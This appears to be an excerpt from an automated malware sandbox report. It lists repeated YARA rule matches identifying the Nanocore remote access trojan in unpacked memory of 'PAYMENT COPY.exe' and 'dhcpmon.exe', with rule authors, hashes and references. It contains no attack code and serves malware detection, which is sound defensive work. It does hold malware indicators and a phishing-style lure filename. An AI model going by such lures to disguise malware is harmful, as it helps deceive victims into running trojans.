    Source: 1.2.PAYMENT COPY.exe.780000.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.780000.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.PAYMENT COPY.exe.27b2a64.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.27b2a64.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.PAYMENT COPY.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.PAYMENT COPY.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.700000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.700000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 15.2.dhcpmon.exe.47b0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 15.2.dhcpmon.exe.47b0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 15.2.dhcpmon.exe.47b0000.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.3430821.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.3430821.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 15.2.dhcpmon.exe.565f58.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 15.2.dhcpmon.exe.565f58.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 15.2.dhcpmon.exe.565f58.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.750000.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.750000.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 15.2.dhcpmon.exe.4e30000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 15.2.dhcpmon.exe.4e30000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 15.2.dhcpmon.exe.4e30000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.37b0e8f.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.37b0e8f.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 8.2.PAYMENT COPY.exe.243cc68.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 8.2.PAYMENT COPY.exe.243cc68.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 8.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 8.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 8.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 15.2.dhcpmon.exe.565f58.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 15.2.dhcpmon.exe.565f58.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 15.2.dhcpmon.exe.565f58.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.342c1f8.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.342c1f8.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 0.2.PAYMENT COPY.exe.2a80000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0.2.PAYMENT COPY.exe.2a80000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 0.2.PAYMENT COPY.exe.2a80000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.5b2488.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.5b2488.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.PAYMENT COPY.exe.5b2488.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.5b2488.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.5b2488.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.PAYMENT COPY.exe.5b2488.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 8.1.PAYMENT COPY.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 8.1.PAYMENT COPY.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 8.1.PAYMENT COPY.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 14.2.dhcpmon.exe.2a50000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 14.2.dhcpmon.exe.2a50000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 14.2.dhcpmon.exe.2a50000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 8.1.PAYMENT COPY.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 8.1.PAYMENT COPY.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 8.1.PAYMENT COPY.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 15.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 15.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 15.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.342c1f8.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.342c1f8.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.PAYMENT COPY.exe.6f0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.6f0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 14.2.dhcpmon.exe.2a61458.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 14.2.dhcpmon.exe.2a61458.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 14.2.dhcpmon.exe.2a61458.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 0.2.PAYMENT COPY.exe.2a91458.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0.2.PAYMENT COPY.exe.2a91458.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 0.2.PAYMENT COPY.exe.2a91458.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.24228c4.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.24228c4.18.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.680000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.680000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.PAYMENT COPY.exe.2436f00.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.2436f00.20.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.365ec98.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.365ec98.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.PAYMENT COPY.exe.27a65e4.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.27a65e4.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.PAYMENT COPY.exe.27a65e4.21.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.710000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.710000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.PAYMENT COPY.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.PAYMENT COPY.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.366d53c.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
